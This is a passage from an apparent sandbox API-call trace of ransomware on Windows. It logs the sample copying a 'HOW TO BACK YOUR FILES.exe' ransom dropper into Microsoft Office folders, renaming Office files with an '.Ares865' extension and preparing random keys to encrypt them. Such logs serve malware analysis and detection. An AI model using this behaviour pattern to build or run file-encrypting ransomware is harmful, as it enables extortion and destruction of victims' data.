lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033") returned="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033" [0072.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0072.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0072.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033") returned 62 [0072.031] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033") returned="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033" [0072.031] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0072.031] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\document parts\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0072.035] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0072.035] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e3382f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c6fdfa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c6fdfa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0072.035] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.035] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0072.035] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14") returned="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14" [0072.035] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0072.035] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2460 | out: hHeap=0x2b0000) returned 1 [0072.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14") returned 65 [0072.036] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14") returned="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14" [0072.036] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0072.036] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\document parts\\1033\\14\\how to back your files.exe"), bFailIfExists=1) returned 1 [0072.039] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0072.039] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e3382f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c724100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c724100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0072.040] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.040] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0072.040] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT") returned="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT" [0072.040] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0072.040] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0072.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT") returned 50 [0072.040] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT") returned="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT" [0072.040] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0072.040] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\how to back your files.exe"), bFailIfExists=1) returned 1 [0072.052] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0072.052] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfff68b70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5c724100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c724100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0072.052] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.052] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0072.052] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033") returned="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033" [0072.052] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0072.052] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0072.052] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033") returned 55 [0072.052] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033") returned="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033" [0072.053] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0072.053] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0072.067] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0072.067] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe7ef0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c74a260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c74a260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0072.067] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.067] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0072.068] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS") returned="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS" [0072.068] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0072.068] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0072.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS") returned 50 [0072.068] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS") returned="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS" [0072.068] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0072.068] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\how to back your files.exe"), bFailIfExists=1) returned 1 [0072.082] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0072.082] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58b4ce70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c7703c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c7703c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0072.083] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.083] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0072.083] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography") returned="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography" [0072.083] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0072.083] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0072.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography") returned 55 [0072.083] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography") returned="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography" [0072.083] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0072.083] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\how to back your files.exe"), bFailIfExists=1) returned 1 [0072.093] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0072.093] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51422110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c796520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c796520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0072.093] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.093] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0072.093] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style") returned="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style" [0072.093] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0072.093] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0072.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style") returned 61 [0072.093] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style") returned="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style" [0072.093] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0072.093] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\style\\how to back your files.exe"), bFailIfExists=1) returned 1 [0072.101] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0072.101] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Style\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51422110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c796520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c796520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0072.101] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.101] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0072.102] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort") returned="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort" [0072.102] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0072.102] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0072.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort") returned 60 [0072.102] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort") returned="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort" [0072.102] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0072.102] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\bibliography\\sort\\how to back your files.exe"), bFailIfExists=1) returned 1 [0072.106] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0072.106] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Bibliography\\Sort\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c7bc680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c7bc680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0072.106] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.106] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0072.106] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS") returned="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS" [0072.106] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0072.106] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0072.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS") returned 49 [0072.106] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS") returned="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS" [0072.106] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0072.106] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\how to back your files.exe"), bFailIfExists=1) returned 1 [0072.116] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0072.116] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfff68b70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5c7bc680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c7bc680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0072.116] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.116] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0072.116] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.XML.Ares865") returned 68 [0072.116] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.XML" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\msosec.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\msosec.xml.ares865"), dwFlags=0x1) returned 1 [0072.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\MSOSEC.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\msosec.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0072.120] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=179) returned 1 [0072.120] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0072.121] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0072.121] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0072.128] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0072.128] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0072.128] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0072.129] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ") returned="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ" [0072.129] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc5b0 | out: hHeap=0x2b0000) returned 1 [0072.129] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0072.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ") returned 49 [0072.129] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ") returned="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ" [0072.129] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0072.129] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\how to back your files.exe"), bFailIfExists=1) returned 1 [0072.137] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0072.137] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51174850, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c808940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c808940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0072.137] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0072.137] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0072.137] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZLIB.ACCDE.Ares865") returned 71 [0072.137] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZLIB.ACCDE" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzlib.accde"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZLIB.ACCDE.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzlib.accde.ares865"), dwFlags=0x1) returned 1 [0072.139] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZLIB.ACCDE.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzlib.accde.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0072.139] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2113536) returned 1 [0072.139] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0072.140] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0072.140] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0072.280] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0072.281] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0072.281] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0072.291] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.Ares865") returned 72 [0072.291] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzmain.accde"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\accwiz\\acwzmain.accde.ares865"), dwFlags=0x1) returned 1 [0072.292] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ACCWIZ\\ACWZMAIN.ACCDE.Ares865" (normalized: 